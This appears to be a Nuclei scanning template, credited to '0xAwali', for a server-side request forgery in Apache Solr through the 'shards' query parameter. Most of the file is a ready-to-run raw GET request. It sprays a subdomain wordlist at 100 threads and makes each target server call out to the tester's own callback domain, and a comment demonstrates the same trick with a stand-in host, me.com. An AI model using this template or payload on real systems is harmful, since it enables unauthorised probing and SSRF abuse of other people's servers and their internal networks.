ApacheSolr-SSRF-2.yaml

id: ApacheSolr-SSRF-2

info:
  name: Apache Solr SSRF
  author: 0xAwali
  severity: critical
  description: Apache Solr SSRF Via Shards Parameter , Commonly Bound Ports 8983
  #Add shards Parameter To Any Query e.g. q=search&shards=http://me.com OR q=search%26shards=http://me.com
  reference:
      - https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#solr
      - https://github.com/veracode-research/solr-injection
      
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /solr/db/select?q=orange&shards=http://{{Host}}.{{Port}}.{{Subdomains}}.apachesolr.{{MY-DOMAIN}}/solr/atom&qt=/select?fl=id,name:author&wt=json HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate